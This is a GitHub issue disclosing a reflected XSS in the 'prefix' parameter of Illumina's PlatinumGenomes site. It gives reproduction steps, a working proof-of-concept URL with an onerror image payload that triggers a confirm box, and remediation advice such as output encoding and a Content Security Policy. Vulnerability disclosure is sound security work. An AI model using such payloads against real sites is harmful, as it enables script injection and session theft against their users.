We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello Security Team today I found Reflected XSS on your own website
1-Got this Url: https://illumina.github.io/PlatinumGenomes/?prefix= 2-Add Payload XSS In Parameter prefix Done Exploit
https://illumina.github.io/PlatinumGenomes/?prefix=
prefix
https://illumina.github.io/PlatinumGenomes/?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E
1'"<Img Src OnError=confirm('xElkomy')>
Delete the reflect for prefix parameter Filter input on arrival Encode data on output Use appropriate response headers Content Security Policy.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Steps:-
1-Got this Url:
https://illumina.github.io/PlatinumGenomes/?prefix=
2-Add Payload XSS In Parameter
prefix
Done Exploit
Example:-
https://illumina.github.io/PlatinumGenomes/?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E
payload:
1'"<Img Src OnError=confirm('xElkomy')>
Fix:-
Delete the reflect for prefix parameter
Filter input on arrival
Encode data on output
Use appropriate response headers
Content Security Policy.
The text was updated successfully, but these errors were encountered: